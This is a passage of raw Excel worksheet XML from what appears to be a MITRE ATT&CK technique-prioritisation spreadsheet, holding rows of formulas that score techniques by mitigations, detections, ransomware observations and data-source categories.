        <v>0</v>
      </c>
      <c r="X620" s="37">
        <v>0</v>
      </c>
      <c r="Y620" s="37">
        <v>0</v>
      </c>
      <c r="Z620" s="37">
        <v>6</v>
      </c>
      <c r="AA620" s="37">
        <v>0.06</v>
      </c>
      <c r="AB620" s="37">
        <v>0.06</v>
      </c>
      <c r="AC620" s="37"/>
      <c r="AD620" s="50" t="s">
        <v>2007</v>
      </c>
      <c r="AE620" s="37" t="str" cm="1">
        <f t="array" ref="AE620">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD620)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF620" s="37">
        <v>616</v>
      </c>
      <c r="AG620" s="37" t="str" cm="1">
        <f t="array" ref="AG620">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD620)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH620" s="37">
        <v>616</v>
      </c>
      <c r="AI620" s="37" t="str" cm="1">
        <f t="array" ref="AI620">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD620)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ620" s="37">
        <v>616</v>
      </c>
      <c r="AK620" s="37" t="str" cm="1">
        <f t="array" ref="AK620">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD620)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL620" s="37">
        <v>616</v>
      </c>
      <c r="AM620" s="37" t="str" cm="1">
        <f t="array" ref="AM620">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD620)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN620" s="37">
        <v>0</v>
      </c>
      <c r="AO620" s="37">
        <v>0</v>
      </c>
      <c r="AP620" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ620" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>105.64285714285712</v>
      </c>
      <c r="AR620" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS620" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT620" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU62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21" spans="1:47" ht="51">
      <c r="A621" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B621" s="37">
        <f t="shared" si="9"/>
        <v>246.9</v>
      </c>
      <c r="C621" s="37" t="s">
        <v>3689</v>
      </c>
      <c r="D621" s="50" t="s">
        <v>2009</v>
      </c>
      <c r="E621" s="37" t="s">
        <v>72</v>
      </c>
      <c r="F621" s="37">
        <v>1</v>
      </c>
      <c r="G621" s="37">
        <v>1</v>
      </c>
      <c r="H621" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I621" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J621" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K621" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L621" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M621" s="37">
        <v>0</v>
      </c>
      <c r="N621" s="56">
        <v>0</v>
      </c>
      <c r="O621" s="56">
        <v>0</v>
      </c>
      <c r="P621" s="56">
        <v>0</v>
      </c>
      <c r="Q621" s="56">
        <v>0</v>
      </c>
      <c r="R621" s="57"/>
      <c r="S621" s="57"/>
      <c r="T621" s="57"/>
      <c r="U621" s="57"/>
      <c r="V621" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W621" s="37"/>
      <c r="X621" s="37"/>
      <c r="Y621" s="37"/>
      <c r="Z621" s="37"/>
      <c r="AA621" s="37"/>
      <c r="AB621" s="37"/>
      <c r="AC621" s="37"/>
      <c r="AD621" s="50" t="s">
        <v>3824</v>
      </c>
      <c r="AE621" s="37" t="str" cm="1">
        <f t="array" ref="AE621">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD621)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF621" s="37">
        <v>617</v>
      </c>
      <c r="AG621" s="37" t="str" cm="1">
        <f t="array" ref="AG621">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD621)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH621" s="37">
        <v>617</v>
      </c>
      <c r="AI621" s="37" t="str" cm="1">
        <f t="array" ref="AI621">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD621)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ621" s="37">
        <v>617</v>
      </c>
      <c r="AK621" s="37" t="str" cm="1">
        <f t="array" ref="AK621">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD621)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL621" s="37">
        <v>617</v>
      </c>
      <c r="AM621" s="37" t="str" cm="1">
        <f t="array" ref="AM621">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD621)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN621" s="37"/>
      <c r="AO621" s="37"/>
      <c r="AP621" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ621" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>82.3</v>
      </c>
      <c r="AR621" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS621" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT621" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU62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22" spans="1:47" ht="51">
      <c r="A622" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B622" s="37">
        <f t="shared" si="9"/>
        <v>247.3</v>
      </c>
      <c r="C622" s="37" t="s">
        <v>2008</v>
      </c>
      <c r="D622" s="50" t="s">
        <v>2009</v>
      </c>
      <c r="E622" s="37"/>
      <c r="F622" s="37">
        <v>1</v>
      </c>
      <c r="G622" s="37">
        <v>1</v>
      </c>
      <c r="H622" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I622" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J622" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K622" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L622" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M622" s="37">
        <v>0</v>
      </c>
      <c r="N622" s="56">
        <v>0</v>
      </c>
      <c r="O622" s="56">
        <v>0</v>
      </c>
      <c r="P622" s="56">
        <v>0</v>
      </c>
      <c r="Q622" s="56">
        <v>0</v>
      </c>
      <c r="R622" s="57"/>
      <c r="S622" s="57">
        <v>0</v>
      </c>
      <c r="T622" s="57" t="s">
        <v>2010</v>
      </c>
      <c r="U622" s="57">
        <v>0</v>
      </c>
      <c r="V622" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W622" s="37">
        <v>0</v>
      </c>
      <c r="X622" s="37">
        <v>0</v>
      </c>
      <c r="Y622" s="37">
        <v>0</v>
      </c>
      <c r="Z622" s="37">
        <v>0</v>
      </c>
      <c r="AA622" s="37">
        <v>0</v>
      </c>
      <c r="AB622" s="37">
        <v>0</v>
      </c>
      <c r="AC622" s="37"/>
      <c r="AD622" s="50" t="s">
        <v>2011</v>
      </c>
      <c r="AE622" s="37" t="str" cm="1">
        <f t="array" ref="AE622">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD622)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF622" s="37">
        <v>618</v>
      </c>
      <c r="AG622" s="37" t="str" cm="1">
        <f t="array" ref="AG622">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD622)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH622" s="37">
        <v>618</v>
      </c>
      <c r="AI622" s="37" t="str" cm="1">
        <f t="array" ref="AI622">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD622)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ622" s="37">
        <v>618</v>
      </c>
      <c r="AK622" s="37" t="str" cm="1">
        <f t="array" ref="AK622">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD622)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL622" s="37">
        <v>618</v>
      </c>
      <c r="AM622" s="37" t="str" cm="1">
        <f t="array" ref="AM622">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD622)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN622" s="37">
        <v>0</v>
      </c>
      <c r="AO622" s="37">
        <v>0</v>
      </c>
      <c r="AP622" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ622" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>82.433333333333337</v>
      </c>
      <c r="AR622" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS622" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT622" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU62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23" spans="1:47" ht="34">
      <c r="A623" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B623" s="37">
        <f t="shared" si="9"/>
        <v>271.29047619047617</v>
      </c>
      <c r="C623" s="37" t="s">
        <v>2012</v>
      </c>
      <c r="D623" s="50" t="s">
        <v>2013</v>
      </c>
      <c r="E623" s="37"/>
      <c r="F623" s="37">
        <v>1</v>
      </c>
      <c r="G623" s="37">
        <v>1</v>
      </c>
      <c r="H623" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I623" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J623" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K623" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L623" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M623" s="37">
        <v>0</v>
      </c>
      <c r="N623" s="56">
        <v>0</v>
      </c>
      <c r="O623" s="56">
        <v>0</v>
      </c>
      <c r="P623" s="56">
        <v>2</v>
      </c>
      <c r="Q623" s="56">
        <v>0</v>
      </c>
      <c r="R623" s="57"/>
      <c r="S623" s="57">
        <v>0</v>
      </c>
      <c r="T623" s="57" t="s">
        <v>2014</v>
      </c>
      <c r="U623" s="57">
        <v>0</v>
      </c>
      <c r="V623" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W623" s="37">
        <v>0</v>
      </c>
      <c r="X623" s="37">
        <v>0</v>
      </c>
      <c r="Y623" s="37">
        <v>0</v>
      </c>
      <c r="Z623" s="37">
        <v>2</v>
      </c>
      <c r="AA623" s="37">
        <v>0.02</v>
      </c>
      <c r="AB623" s="37">
        <v>0.02</v>
      </c>
      <c r="AC623" s="37"/>
      <c r="AD623" s="50" t="s">
        <v>2015</v>
      </c>
      <c r="AE623" s="37" t="str" cm="1">
        <f t="array" ref="AE623">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD623)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF623" s="37">
        <v>619</v>
      </c>
      <c r="AG623" s="37" t="str" cm="1">
        <f t="array" ref="AG623">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD623)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH623" s="37">
        <v>619</v>
      </c>
      <c r="AI623" s="37" t="str" cm="1">
        <f t="array" ref="AI623">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD623)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ623" s="37">
        <v>619</v>
      </c>
      <c r="AK623" s="37" t="str" cm="1">
        <f t="array" ref="AK623">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD623)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL623" s="37">
        <v>619</v>
      </c>
      <c r="AM623" s="37" t="str" cm="1">
        <f t="array" ref="AM623">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD623)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN623" s="37">
        <v>0</v>
      </c>
      <c r="AO623" s="37">
        <v>0</v>
      </c>
      <c r="AP623" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ623" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>90.430158730158723</v>
      </c>
      <c r="AR623" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS623" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT623" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU62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24" spans="1:47" ht="34">
      <c r="A624" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B624" s="37">
        <f t="shared" si="9"/>
        <v>259.91428571428571</v>
      </c>
      <c r="C624" s="37" t="s">
        <v>2016</v>
      </c>
      <c r="D624" s="50" t="s">
        <v>2017</v>
      </c>
      <c r="E624" s="37"/>
      <c r="F624" s="37">
        <v>1</v>
      </c>
      <c r="G624" s="37">
        <v>1</v>
      </c>
      <c r="H624" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I624" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J624" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K624" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L624" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M624" s="37">
        <v>0</v>
      </c>
      <c r="N624" s="56">
        <v>0</v>
      </c>
      <c r="O624" s="56">
        <v>0</v>
      </c>
      <c r="P624" s="56">
        <v>1</v>
      </c>
      <c r="Q624" s="56">
        <v>0</v>
      </c>
      <c r="R624" s="57"/>
      <c r="S624" s="57">
        <v>0</v>
      </c>
      <c r="T624" s="57"/>
      <c r="U624" s="57">
        <v>0</v>
      </c>
      <c r="V624" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W624" s="37">
        <v>0</v>
      </c>
      <c r="X624" s="37">
        <v>0</v>
      </c>
      <c r="Y624" s="37">
        <v>0</v>
      </c>
      <c r="Z624" s="37">
        <v>1</v>
      </c>
      <c r="AA624" s="37">
        <v>0.01</v>
      </c>
      <c r="AB624" s="37">
        <v>0.01</v>
      </c>
      <c r="AC624" s="37"/>
      <c r="AD624" s="50" t="s">
        <v>131</v>
      </c>
      <c r="AE624" s="37" t="str" cm="1">
        <f t="array" ref="AE624">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD624)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF624" s="37">
        <v>620</v>
      </c>
      <c r="AG624" s="37" t="str" cm="1">
        <f t="array" ref="AG624">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD624)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH624" s="37">
        <v>620</v>
      </c>
      <c r="AI624" s="37" t="str" cm="1">
        <f t="array" ref="AI624">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD624)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ624" s="37">
        <v>620</v>
      </c>
      <c r="AK624" s="37" t="str" cm="1">
        <f t="array" ref="AK624">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD624)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL624" s="37">
        <v>620</v>
      </c>
      <c r="AM624" s="37" t="str" cm="1">
        <f t="array" ref="AM624">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD624)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN624" s="37">
        <v>0</v>
      </c>
      <c r="AO624" s="37">
        <v>0</v>
      </c>
      <c r="AP624" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ624" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>86.638095238095232</v>
      </c>
      <c r="AR624" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS624" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT624" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU62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25" spans="1:47" ht="51">
      <c r="A625" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B625" s="37">
        <f t="shared" si="9"/>
        <v>260.33333333333331</v>
      </c>
      <c r="C625" s="37" t="s">
        <v>2018</v>
      </c>
      <c r="D625" s="50" t="s">
        <v>2017</v>
      </c>
      <c r="E625" s="37" t="s">
        <v>2019</v>
      </c>
      <c r="F625" s="37">
        <v>1</v>
      </c>
      <c r="G625" s="37">
        <v>1</v>
      </c>
      <c r="H625" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I625" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J625" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K625" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L625" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M625" s="37">
        <v>0</v>
      </c>
      <c r="N625" s="56">
        <v>0</v>
      </c>
      <c r="O625" s="56">
        <v>1</v>
      </c>
      <c r="P625" s="56">
        <v>0</v>
      </c>
      <c r="Q625" s="56">
        <v>0</v>
      </c>
      <c r="R625" s="57"/>
      <c r="S625" s="57">
        <v>0</v>
      </c>
      <c r="T625" s="57"/>
      <c r="U625" s="57">
        <v>0</v>
      </c>
      <c r="V625" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>4.7619047619047615E-3</v>
      </c>
      <c r="W625" s="37">
        <v>0</v>
      </c>
      <c r="X625" s="37">
        <v>0</v>
      </c>
      <c r="Y625" s="37">
        <v>0</v>
      </c>
      <c r="Z625" s="37">
        <v>1</v>
      </c>
      <c r="AA625" s="37">
        <v>0.01</v>
      </c>
      <c r="AB625" s="37">
        <v>0.01</v>
      </c>
      <c r="AC625" s="37"/>
      <c r="AD625" s="50" t="s">
        <v>150</v>
      </c>
      <c r="AE625" s="37" t="str" cm="1">
        <f t="array" ref="AE625">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD625)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF625" s="37">
        <v>621</v>
      </c>
      <c r="AG625" s="37" t="str" cm="1">
        <f t="array" ref="AG625">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD625)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH625" s="37">
        <v>621</v>
      </c>
      <c r="AI625" s="37" t="str" cm="1">
        <f t="array" ref="AI625">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD625)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ625" s="37">
        <v>621</v>
      </c>
      <c r="AK625" s="37" t="str" cm="1">
        <f t="array" ref="AK625">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD625)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL625" s="37">
        <v>621</v>
      </c>
      <c r="AM625" s="37" t="str" cm="1">
        <f t="array" ref="AM625">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD625)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN625" s="37">
        <v>0</v>
      </c>
      <c r="AO625" s="37">
        <v>0</v>
      </c>
      <c r="AP625" s="37">
